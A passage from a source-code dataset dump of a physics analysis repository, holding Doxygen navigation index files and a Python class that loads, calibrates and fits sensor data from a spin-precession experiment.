sensors'\n\tfpath=ddir+fname\n\n\tdat=loadAbin(fpath, useMetaFile=True);\n\tdat2=loadBins(ddir+'SP_aparatus 5256.38 Medium')\n\tdat3=loadBins(ddir2+fname2, useMetaFile=True)\n" }, { "alpha_fraction": 0.6398305296897888, "alphanum_fraction": 0.7262712121009827, "avg_line_length": 83.35713958740234, "blob_id": "2e993e9a302ef4e756035aecf1831d58d1eaa24e", "content_id": "8a557f375826f176e955eb2f3b651ee5e0a2084b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1180, "license_type": "no_license", "max_line_length": 157, "num_lines": 14, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages_1_1pr.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages_1_1pr =\n[\n [ \"convert\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1convert.html\", null ],\n [ \"getSPdata\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html\", null ],\n [ \"loadSPFiles\", 
\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html\", null ],\n [ \"openCPT\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html\", null ],\n [ \"openMotor\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openMotor.html\", null ],\n [ \"scrap\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1scrap.html\", null ],\n [ \"sdtime\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html\", null ],\n [ \"SPDataSet\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet\" ],\n [ \"SPfuncs\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html\", null ],\n [ \"SPgraphs\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPgraphs.html\", null ],\n [ \"test_SPfuncs\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1test__SPfuncs.html\", null ]\n];" }, { "alpha_fraction": 0.5389610528945923, "alphanum_fraction": 0.5779221057891846, "avg_line_length": 29.799999237060547, "blob_id": "782b8bc4ba31c8ef27544988517d604d3da3b0d7", "content_id": "b3ad0c6ad0f368c347b200123c7de77e555f651a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 154, "license_type": "no_license", "max_line_length": 68, "num_lines": 5, "path": "/html/search/files_4.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['opencpt_2epy',['openCPT.py',['../openCPT_8py.html',1,'']]],\n ['openmotor_2epy',['openMotor.py',['../openMotor_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.6550925970077515, "alphanum_fraction": 0.7754629850387573, "avg_line_length": 85.4000015258789, "blob_id": "90d5d8817df90c0bd8fd8bb843e82f438b4bdcd9", "content_id": "4b6b83907a0e42476a2ee732618681acc235d39e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 432, "license_type": "no_license", "max_line_length": 213, "num_lines": 5, "path": "/html/search/variables_1.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['caloverride',['calOverride',['../classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ae16a2ee209ef5a9dbc5d9634b3bc6fef',1,'repo::programs::pythonpackages::pr::SPDataSet::SPDataSet']]],\n ['correlationdata',['CorrelationData',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html#a97ee543cf8ac7b27443cbfe8ff2e20f3',1,'repo::programs::pythonpackages::pr::SPfuncs']]]\n];\n" }, { "alpha_fraction": 0.4771573543548584, "alphanum_fraction": 0.7360405921936035, "avg_line_length": 64.73332977294922, "blob_id": "ecb0648266a383fc44b3670b758ecc178db5388e", "content_id": "a933bc9592d21e2b21fbd33317a99e5a043e5336", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 985, "license_type": "no_license", "max_line_length": 82, "num_lines": 15, "path": "/html/getSPdata_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var getSPdata_8py =\n[\n [ \"getSPData\", \"getSPdata_8py.html#abf99dd1de2422300e6e0810c52e352b0\", null ],\n [ \"data\", \"getSPdata_8py.html#afcc30f10d3721c1b098ac36014f598ba\", null ],\n [ \"data2\", \"getSPdata_8py.html#aadc073490775819f8e7b4eecba84d8c0\", null ],\n [ \"fid\", \"getSPdata_8py.html#a0a88573676ca77c114f061278e10a9e5\", null ],\n [ \"mtrig\", \"getSPdata_8py.html#a98628f2f931f1936c89b4f2c90610736\", null ],\n [ 
\"posfiles\", \"getSPdata_8py.html#ab7bcb6dc1e35e343ea3d5a9f790c1f42\", null ],\n [ \"rotations\", \"getSPdata_8py.html#a3cd7917344307847daed23d1f68575c4\", null ],\n [ \"sdP\", \"getSPdata_8py.html#a1dcdb0bd4cf5fc99ddd642fd2e7dcb7b\", null ],\n [ \"sensfiles\", \"getSPdata_8py.html#ad0b93fd48f5d39d35267e0463a7d2e52\", null ],\n [ \"sensor\", \"getSPdata_8py.html#a5d2dee28b4f96a6448beb4b18e01fb24\", null ],\n [ \"trig\", \"getSPdata_8py.html#af3d30f9077a6d1c700f7f691a8288334\", null ],\n [ \"trigfiles\", \"getSPdata_8py.html#aa7e1cd1161dfd5e09ecfea09630c0395\", null ]\n];" }, { "alpha_fraction": 0.6612903475761414, "alphanum_fraction": 0.774193525314331, "avg_line_length": 61.25, "blob_id": "e972258cb7e2d9cdbc49db072a0ebd2e6bc1083e", "content_id": "a1953e05597e37cf64e4b550f50e9961b98bbab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 248, "license_type": "no_license", "max_line_length": 174, "num_lines": 4, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess =\n[\n [ \"SPDataSet\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess_1_1SPDataSet.html\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess_1_1SPDataSet\" ]\n];" }, { "alpha_fraction": 0.6091954112052917, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20.700000762939453, "blob_id": "05dadfa330fb5c9270ea75ae6aed8654602bc261", "content_id": "124ccd059cbd8c8c0bc5f02cdd70026eb5f8205c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/scrap.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import loadSPFiles as lspf\nimport SPDataSet as sd\nimport SPfuncs as spf\nimport MT\n\n\n\ndef test():\n ds=sd.SPDataSet('5310.41')\n sAmp1=ds.sequenceAmp(sigWindow=spf.Window(3,-6))\n sAmp2=ds.sequenceAmp(sigWindow=spf.Window(3,-3))\n\n sig1=sAmp1.sig.ravel()\n sig2=sAmp2.sig.ravel()\n err1=sAmp1.err.ravel()\n err2=sAmp2.err.ravel()\n t=sAmp1.t.ravel()\n figure()\n errorbar(t, sig1, err1)\n errorbar(t, sig2, err2)\n\n" }, { "alpha_fraction": 0.6612903475761414, "alphanum_fraction": 0.774193525314331, "avg_line_length": 61.25, "blob_id": "fafb7f5d98e85e755c86eb2daf8c686e57f22572", "content_id": "b9a8536e49b3f3b6bce86af2c5df16591e2be01d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 248, "license_type": "no_license", "max_line_length": 174, "num_lines": 4, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet =\n[\n [ \"SPDataSet\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet\" ]\n];" }, { "alpha_fraction": 0.6052631735801697, "alphanum_fraction": 0.7552631497383118, "avg_line_length": 75, "blob_id": "3b486ca94e8c8e990662a6e4c2f02b669bb2eb2b", "content_id": "2b2d63969a64c17a9ca6d99c35686d015f970740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 380, "license_type": "no_license", "max_line_length": 183, 
"num_lines": 5, "path": "/html/search/variables_d.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['y2000secs',['y2000secs',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html#ad0dcc84eadafdd803d57e73ef2c6e4a2',1,'repo::programs::pythonpackages::pr::sdtime']]],\n ['ys',['ys',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html#af4556d66bac96baab9aed887e66ce083',1,'repo::programs::pythonpackages::pr::SPDataSet']]]\n];\n" }, { "alpha_fraction": 0.5219885110855103, "alphanum_fraction": 0.7361376881599426, "avg_line_length": 64.5, "blob_id": "6855465341919dfd83ec7af0ea6cb9e79a4719de", "content_id": "9a208356878ecf426c8ecf1a8b51cdc1edb9968b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 523, "license_type": "no_license", "max_line_length": 103, "num_lines": 8, "path": "/html/test__SPfuncs_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var test__SPfuncs_8py =\n[\n [ \"fake_data_continuous\", \"test__SPfuncs_8py.html#a590b9f06cd4d860f79e97e27c86548ed\", null ],\n [ \"fake_data_stop_start_2dirs\", \"test__SPfuncs_8py.html#a5b95fcf3c92f76fce1b2bf36daa02403\", null ],\n [ \"fake_data_stop_start_4dirs\", \"test__SPfuncs_8py.html#a5faeabf3b186e4e18ec4ee66a1111342\", null ],\n [ \"test_continuous_fitting\", \"test__SPfuncs_8py.html#af18588089ac02705cb7205aec7430241\", null ],\n [ \"test_cutAmp\", \"test__SPfuncs_8py.html#a287834089412b429481b6b2b90e2d6bf\", null ]\n];" }, { "alpha_fraction": 0.5672060251235962, "alphanum_fraction": 0.5835860371589661, "avg_line_length": 39.46559524536133, "blob_id": "fc247f47460f137018bf384e844d683ce7e19e7d", "content_id": "39580c7635194540801ff9e2db654bbb3dde705f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35287, "license_type": "no_license", "max_line_length": 203, "num_lines": 872, "path": "/SPDataSet.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nimport pdb\nfrom collections import namedtuple\nfrom functools import partial\nfrom pylab import *\nimport SPfuncs as sp\nfrom MT import nonnan, cached_property, memoize_inst_meth, nearby_angles, combine_angle_pairs, rotate_quadrature_sample, weightedStats, vprint\nimport MT, os\nimport loadSPFiles\nfrom SPfuncs import getAnglesFromRSpec, renameFieldMaybe, getHarmonicsFit, mgStringHarmonics, sliceReduceData, sliceSorted, makeTriggers, Window, RotationSpec, secs2sd, sd2secs, makeTestData, spSearchSet\nfrom SPfuncs import CorrelationData, SiderealFitData, PointData, RawData\nimport SPfuncs as spf\nimport loadSPFiles\nfrom scipy import random\nimport inspect\nimport yaml\nfrom copy import copy\nfrom pprint import pprint\n\n#This works with memoize_inst_methd methods only (and only with Morgan's modified version)\ndef divide_args_memo(kwargs, func_to_follow):\n names_to_keep=list(set(kwargs.keys()) & set(func_to_follow.orig_args[1:]))\n kept_args=dict( [(key, kwargs.pop(key)) for key in names_to_keep] )\n return kwargs, kept_args\n\ndef divide_args(cur_kwargs, work_func):\n \"\"\"Helpful for calling work_func(following_func(**remaining_args), **work_args))\n work_args are the entries of cur_kwargs that are in the argument list of work_func. 
Remaining_args are those left over\n Currently just returns the divided argument list\n \"\"\"\n names_to_keep=list(set(cur_kwargs.keys()) & set(inspect.getargspec(work_func).args))\n work_args=dict( [(key, cur_kwargs.pop(key)) for key in names_to_keep] )\n #return work_func(following_func(**cur_kwargs), **work_args)\n return cur_kwargs, work_args\n\nttl=300\nclass SPDataSet(object):\n setNameD={\n 'med':'medD',\n 'medium':'medD',\n 'rel':'relD',\n 'relaxed':'relD',\n 'fast':'fastD',\n '':'fastD',\n 'motor':'motorD',\n 'mot':'motorD',\n }\n def __init__(self, timestamp, preloadDict={}, startTime=-inf, endTime=inf, **kwargs):\n self.windowD={}\n self.timestamp=timestamp \n self.startTime=startTime\n self.endTime=endTime\n self.base_dir, self.base_name=loadSPFiles.getSpinningDataNames(timestamp)\n #Add to the class whatever is in preloadDict (these will overide the cached_property functions)\n self.__dict__.update(preloadDict)\n\n\n #Convenience parameter loading from set_info.yaml:\n if kwargs:\n # Just in case you didn't mean to do this, e.g. a typo\n vprint(\"Warning: updating dataset according to kwargs: {0}\".format(kwargs))\n self.__dict__.update(kwargs)\n if self.set_info.has_key('windows'):\n winD=self.set_info['windows']\n \n for winName, winVals in winD.iteritems():\n self.windowD[winName]=Window(**winVals)\n if self.set_info.has_key('badTimes'):\n self.badTimes=self.set_info['badTimes']\n else:\n self.badTimes=[]\n if self.set_info.has_key('skipSeqIs'):\n self.skipSeqIs=self.set_info['skipSeqIs']\n if not hasattr(self.skipSeqIs, '__iter__'):\n self.skipSeqIs=[self.skipSeqIs]\n else:\n self.skipSeqIs=[]\n if self.set_info.has_key('dropTriggerIs'):\n self.dropTriggerIs=self.set_info['dropTriggerIs']\n if not hasattr(self.dropTriggerIs, '__iter__'):\n self.dropTriggerIs=[self.dropTriggerIs]\n else:\n self.dropTriggerIs=[]\n\n if self.set_info.has_key('calOverride'):\n self.calOverride=self.set_info['calOverride']\n else:\n self.calOverride=None\n \n def clearRaw(self):\n for varname in ['fastD', 'medD', 'relD', 'motorD']:\n self._cache.pop(varname, None)\n \n @property\n def rSpec(self):\n return (self.__dict__['rSpec'] if \n self.__dict__.has_key('rSpec') else \n RotationSpec(**self.set_info['rotationSpec'])\n )\n #return RotationSpec(**self.set_info['rotationSpec'])\n @cached_property(ttl=0)\n def set_info(self):\n \"\"\"Property doc string!!\"\"\"\n if self.timestamp=='test':\n return {}\n return loadSPFiles.loadSetInfo(self.base_dir) \n\n def update_set_info(self, newD):\n cur_info=copy(self.set_info)\n new_keys=newD.keys()\n old_keys=cur_info.keys()\n if not all([key in old_keys for key in new_keys]):\n raise ValueError(\"Some keys don't already exist. 
Edit the info file instead\")\n cur_info.update(newD)\n loadSPFiles.writeSetInfo(self.base_dir, newD)\n\n def tRange(self):\n return [self.fastD[0].min(), self.fastD[0].max()]\n\n #Base level loading\n @staticmethod\n def splitRecArray(rA):\n t=rA['sd']\n names=list(rA.dtype.names)\n names.remove('sd')\n y=rA[names].view(rA.dtype[-1]).reshape(rA.size,-1)\n return [t.copy(), y.T.copy(), names]\n\n @cached_property(ttl=ttl)\n def medD(self):\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(self.base_dir, self.base_name, 'Medium'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def motorPositions(self):\n base_dir,base_name=loadSPFiles.getSpinningDataNames(self.timestamp, bMotorData=True)\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'positions'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n vprint(\"No motor position data\")\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def motorSensors(self):\n base_dir,base_name=loadSPFiles.getSpinningDataNames(self.timestamp, bMotorData=True)\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'sensors'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n vprint(\"No motor sensor data\")\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def relD(self):\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(self.base_dir, self.base_name, 'Relaxed'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def fastD(self):\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(self.base_dir, self.base_name, 'Fast'), totalDataType=[('sd','>f8'), ('s1', '>f4')]) \n if rec is not None:\n dat=self.splitRecArray(rec)\n dat[1]=dat[1].squeeze()\n if self.calOverride is None:\n calArr=self.calArr\n dat[1]=dat[1]*MT.const_interp(dat[0], calArr.t, calArr.val)\n else:\n dat[1]=dat[1]*self.calOverride\n #dat[1]=self.cal*dat[1]\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][startI:endI]\n else:\n return None\n return dat\n\n @cached_property(ttl=ttl)\n def trigTimes(self):\n if self.fastD: #prefer to make triggers with the fast data if it's available\n t=self.rawData().t#fastD[0]\n elif self.medD:\n t=self.medD[0]\n elif self.relD:\n t=self.relD[0]\n else:\n return None\n trigs= makeTriggers(t, self.rSpec, bIncludeExtraRot=True);\n #if self.set_info.has_key('skipFirstTrigger') and self.set_info['skipFirstTrigger']==True:\n # trigs=trigs[:,1:]\n gdTrigMask=ones(self.rSpec.numRotations, dtype=bool) \n gdTrigMask[self.dropTriggerIs]=0\n gdSeqMask=ones(trigs.shape[0], dtype=bool); gdSeqMask[self.skipSeqIs]=0\n trigs=trigs[gdSeqMask]\n 
trigs=trigs[:,gdTrigMask]\n return trigs\n\n @cached_property(ttl=ttl)\n def apparatusRotations(self):\n gdTrigMask=ones(self.rSpec.numRotations, dtype=bool) \n gdTrigMask[self.dropTriggerIs]=0\n return getRotationsFromRSpec(self.rSpec, self.trigTimes.shape[0])[:,gdTrigMask]/180.*pi\n @cached_property(ttl=0)\n def apparatusAngles(self):\n gdTrigMask=ones(self.rSpec.numRotations, dtype=bool) \n gdTrigMask[self.dropTriggerIs]=0\n return getAnglesFromRSpec(self.rSpec, self.trigTimes.shape[0])[:,gdTrigMask]/180.*pi\n\n @cached_property(ttl=0)\n def zeroingD(self):\n zeroD= loadSPFiles.loadZeroFile('{0}{1} Zeroing List.asc'.format(self.base_dir, self.base_name))\n return zeroD\n \n def cBzCal(self):\n dat=loadtxt('{0}{1} Zeroing z1 Calibrations.asc'.format(self.base_dir, self.base_name)).T\n typ= namedtuple('z1CalData', ['t', 'val'])\n return typ(t= dat[0], val=dat[1])\n \n @property\n def calArr(self, process=None):\n calArr=self.zeroingD['Cal']\n if calArr.t.size>1 and process=='average':\n cal=(diff(calArr.t)*calArr.val[:-1]).sum()/diff(calArr.t).sum() \n #cal=(diff(calArr.t)*calArr.val[:-1]).sum()/diff(calArr.t).sum() # A rough time-average. diff(t)*sum(vals)/sum(diff(t))\n elif process is None:\n if calArr.t.size>1:\n cal=calArr\n elif calArr.t.size==1:\n #cal=calArr.val[0]\n print(\"only one Bx callibration, maybe that's a problem\")\n cal=calArr\n else:\n print(\"no Bx callibration found for timestamp {0}? Using coarse-bz calibration instead\".format(self.timestamp))\n cal = self.cBzCal()\n #vprint(\"Callibration is {0}\".format(cal))\n return cal\n\n def pol(self, t=None):\n polTup=self.zeroingD['Pol']\n tmeas=polTup.t\n if t is None:\n return tmeas, polTup.val\n else:\n pol=interp(t, tmeas, polTup.val)\n return pol\n\n def getSensorData(self, nameL):\n return [getRawByName(name) for name in nameL]\n def getRawByName(self, name):\n ''' Names should be of the form \"med:Total Position Sensor 1\" etc\n '''\n if name=='sig':\n return self.rawData()\n setSt, nameSt=name.split(':')\n data_set=self.__getattribute__(self.setNameD[setSt])\n if data_set is None:\n vprint(\"No data for {0}\".format(name))\n return None\n nameL=data_set[2]\n\n if nameSt not in nameL:\n raise ValueError(\"Requested name '{0}' is not in the list of '{1}' sensors\".format(nameSt, setSt))\n I=nameL.index(nameSt)\n return RawData(t=data_set[0], sig=data_set[1][I])\n \n def rawData(self, rawData=None, **kwargs):\n if isinstance(rawData, RawData):\n rawData=rawData\n elif rawData==None:\n rawData=RawData(self.fastD[0], self.fastD[1])\n elif isinstance(rawData, str): #Load a data set according to the string\n rawData=self.getRawByName(rawData)\n if rawData is None:\n return\n\n goodMask=ones(rawData.t.size, dtype=bool)\n if self.badTimes and not hasattr(self.badTimes[0], '__iter__'):\n self.badTimes=[self.badTimes]\n for interval in self.badTimes: \n if interval[1]==-1:\n interval[1]=inf\n Istart, Istop=rawData.t.searchsorted(interval)\n goodMask[Istart:Istop]=False\n\n rawData= RawData(*[p[goodMask] for p in rawData])\n #.sig[~goodMask]\n self.clearRaw()\n return rawData\n #return RawData(t=rawData.t[goodMask], sig=rawData.sig[goodMask])\n\n #Processing 0\n @memoize_inst_meth\n def cutAmp(self, sigWindow=None, cutSensSubL=[], addFakeD=None, **kwargs):\n if sigWindow==None:\n if not self.windowD.has_key('sig'):\n raise ValueError(\"No signal window was given, and there's no default for this set (check set_info file)\")\n sigWindow=self.windowD['sig'] # if no sigWindow is given, assume there's a default one for this 
dataset\n elif isinstance(sigWindow, basestring):\n sigWindow=self.windowD[sigWindow]\n vprint(\"Calculating cut amplitudes\")\n cutAmp= spf.preprocess_raw(self.rawData(**kwargs), self.trigTimes, sigWindow)\n if cutSensSubL:\n sensCutAmpL=[self.cutAmp(rawData=name) for name in cutSensSubL]\n if addFakeD is not None:\n cutAmp=spf.addFakeData(cutAmp, self.apparatusAngles, self.trigTimes, **addFakeD)\n return cutAmp\n #return RawData(rawT, rawSig)\n\n @memoize_inst_meth\n def filteredCutAmp(self, sensNameL=None, **kwargs):\n if sensNameL is None:\n if self.set_info.has_key('sensorFilt'):\n sensNameL=self.set_info['sensorFilt']\n else:\n sensNameL=[]\n\n rem_args, work_args=divide_args(kwargs, spf.filterBySensors)\n D=copy(kwargs)\n if D.has_key('rawData'):\n D.pop('rawData')\n if D.has_key('sensNameL'):\n D.pop('sensNameL')\n cutSensorAmps=[self.pointAmp(rawData=name, **D) for name in sensNameL]\n return spf.filterBySensors(self.cutAmp(**rem_args), sensDataL=cutSensorAmps, **work_args)\n \n @memoize_inst_meth\n def seqAmpFitSplit(self, addFakeD=None, **kwargs):\n \"\"\"Assume it's a continuously rotating sample.\n \"\"\"\n rem_args, work_args=divide_args(kwargs, spf.process_continuous_raw)\n rawSig=self.rawData(**rem_args)\n if addFakeD is not None:\n rawSig=spf.addFakeData(rawSig, rotationRate=self.set_info['rotationRate'], **addFakeD)\n\n rawRef=self.rawData('med:Fluxgate Z')\n if self.set_info.has_key('rotationRate'):\n rotationRate=float(self.set_info['rotationRate'])\n else:\n print(\"WARNING:No ration rate in set_info. We'll guess it's -0.03, but if it's not then the answers will be wrong!!\")\n rotationRate=-0.03\n seqAmp=spf.process_continuous_raw(rawSig, rawRef, rotationRate) \n return seqAmp\n\n #Processing 1\n @memoize_inst_meth\n def pointAmp(self, **kwargs):\n vprint(\"Calculating point amplitudes\")\n if self.set_info.has_key('continuousRotation') and self.set_info['continuousRotation']==True:\n Nds=250\n rAmp=self.rawData(**kwargs)\n ptVals, ptErr= MT.downsample_npts(rAmp.sig, Nds, bRetErr=True)\n ptT=MT.downsample_npts(rAmp.t, Nds)\n return PointData(t=ptT, sig=ptVals,err=ptErr/sqrt(Nds), theta=None, chi2=None)\n #return PointData(t=zeros(0), sig=zeros(0),err=zeros(0), theta=zeros(0), chi2=zeros(0))\n rem_args, work_args=divide_args(kwargs, spf.process_raw)\n #pointAmp= spf.process_raw(self.filteredCutAmp(**rem_args), **work_args)\n pointAmp= spf.process_raw(self.cutAmp(**rem_args), **work_args)\n pointAmp=pointAmp._replace(theta=self.apparatusAngles)\n return pointAmp\n\n #Processing 2\n @memoize_inst_meth\n def sequenceAmp(self, bRemoveZerothRotation=True, subtractWindow=None,genSeqFiltF=None, seqSensSubL=[], **kwargs):\n vprint(\"Calculating sequence amplitudes\")\n if self.set_info.has_key('continuousRotation') and self.set_info['continuousRotation']==True:\n seqAmp=self.seqAmpFitSplit(**kwargs)\n else: #stop-start manner\n rem_args, work_args=divide_args(kwargs, spf.process_points)\n pointAmp=self.pointAmp(**rem_args)\n cutAmp=self.filteredCutAmp(**rem_args)\n\n if bRemoveZerothRotation:\n pointAmp=PointData(*[arr.take(r_[1:arr.shape[-1]], axis=-1) if arr is not None else None for arr in pointAmp])\n cutAmp=RawData(*[arr.take(r_[1:arr.shape[-1]], axis=-1) if arr is not None else None for arr in cutAmp])\n\n seqAmp=spf.process_points(self.apparatusAngles, pointAmp, cutAmp, **work_args)\n if subtractWindow:\n vprint('subtracting window \"{}\"'.format(subtractWindow))\n D=copy(rem_args)\n D.update({'sigWindow':subtractWindow})\n refAmp=self.sequenceAmp(**D)\n 
seqAmp.sig[:]-=refAmp.sig\n\n if seqSensSubL:\n sensSeqAmpL=[self.sequenceAmp(rawData=name) for name in seqSensSubL]\n sensSeqAmpL=[CorrelationData(*[par[:,0,1] for par in sAmp]) for sAmp in sensSeqAmpL]\n sub1HAmp=spf.subtract_correlations(CorrelationData(*[par[:,0,1] for par in seqAmp]), sensSeqAmpL)\n seqAmp.sig[:,0,1]=sub1HAmp.sig\n\n if genSeqFiltF: #General filter on the sequences\n seqAmp=genSeqFiltF(self, seqAmp)\n\n\n return seqAmp\n\n #Processing 3\n @memoize_inst_meth\n def labAmp(self, filtF=None, **kwargs):\n vprint(\"Calculating lab-frame amplitudes\")\n rem_args, work_args=divide_args(kwargs, spf.process_sequences)\n seqAmp=self.sequenceAmp(**rem_args)\n if filtF:\n seqAmp=filtF(seqAmp)\n labAmp, sidAmp= spf.process_sequences(seqAmp)\n return labAmp\n #return spf.split_and_process_sequences(seqAmp, **work_args)\n\n #Processing 3\n @memoize_inst_meth\n def sidAmp(self, filtF=None, coFitL=[], coFitPhaseVaryIs=[], subtractHarmsL=[], harmonic=1, **kwargs):\n h=harmonic-1\n vprint(\"Calculating sidereal amplitudes\")\n rem_args, work_args=divide_args(kwargs, spf.process_sequences_multifit)\n seqAmp=self.sequenceAmp(**rem_args)\n\n #This will be used for the actual processing\n #seqAmp, sensSeqAmpL,\n sensSeqAmpL=[self.sequenceAmp(rawData=name, **rem_args) for name in coFitL]\n\n #Apply the filtering function\n if filtF: #Use some sub-set of the sequences\n seqAmp=filtF(seqAmp)\n if not seqAmp:\n return None\n sensSeqAmpL=zip(*[filtF(sensAmp) for sensAmp in sensSeqAmpL])\n if not sensSeqAmpL:\n sensSeqAmpL=len(seqAmp)*[[]] #Make it a list of empty lists\n\n # Now seqAmp and sensSeqAmpL may be lists (or lists of lists)\n # But if they're not, we'll make sure they are\n if hasattr(seqAmp, 't'):\n seqAmp=[seqAmp]\n if sensSeqAmpL==[]:\n sensSeqAmpL=[sensSeqAmpL]\n \n \n\n if kwargs.has_key('bFitOldWay'):\n work_func=partial(spf.process_sequences)\n labAmp, sidAmp= zip(*[work_func(seqA) for seqA in seqAmp if seqA is not None])\n elif seqAmp:\n work_func=partial(spf.process_sequences_multifit, \n sigSensVaryPhaseIs=coFitPhaseVaryIs, \n subtractHarmsL=subtractHarmsL,harmonic=harmonic, \n **work_args)\n labAmp, sidAmp, _,fObj= zip(*[work_func(seqA, sensAL)[:4] \n for seqA, sensAL in zip(seqAmp, sensSeqAmpL) \n if seqA is not None])\n else:\n print(\"Nothing at timestamp {0}\".format(self.timestamp))\n return None\n if len(sidAmp)==1:\n labAmp=labAmp[0]\n sidAmp=sidAmp[0]\n fObj=fObj[0]\n\n #return labAmp, sidAmp#, fObj\n return sidAmp#, sidAmp\n \n #return spf.split_and_process_sequences(seqAmp, **work_args)\n\n def viewSensors(self, sensorNames, bSharex=False, bPlotStChi2Comp=True, **kwargs):\n if sensorNames=='med':\n sensorNames=['med:'+ name for name in loadSPFiles.mediumNames]\n elif sensorNames=='rel':\n sensorNames=['rel:'+ name for name in loadSPFiles.relaxedNames]\n elif sensorNames=='all':\n sensorNames=['rel:'+ name for name in loadSPFiles.relaxedNames]\n sensorNames.extend(['med:'+ name for name in loadSPFiles.mediumNames])\n self.viewSeq(rawData=sensorNames[0], figName=sensorNames[0], stPtChi2Lim=5, **kwargs)\n ax=gca()\n figL=[gcf()]\n if bSharex==True:\n sharex= ax \n else: \n sharex=None;\n vprint(\"sharex: {}\".format(sharex))\n for name in sensorNames[1:]:\n self.viewSeq(rawData=name, figName=name, sharexAx=sharex, **kwargs)\n figL.append(gcf())\n return figL\n\n def 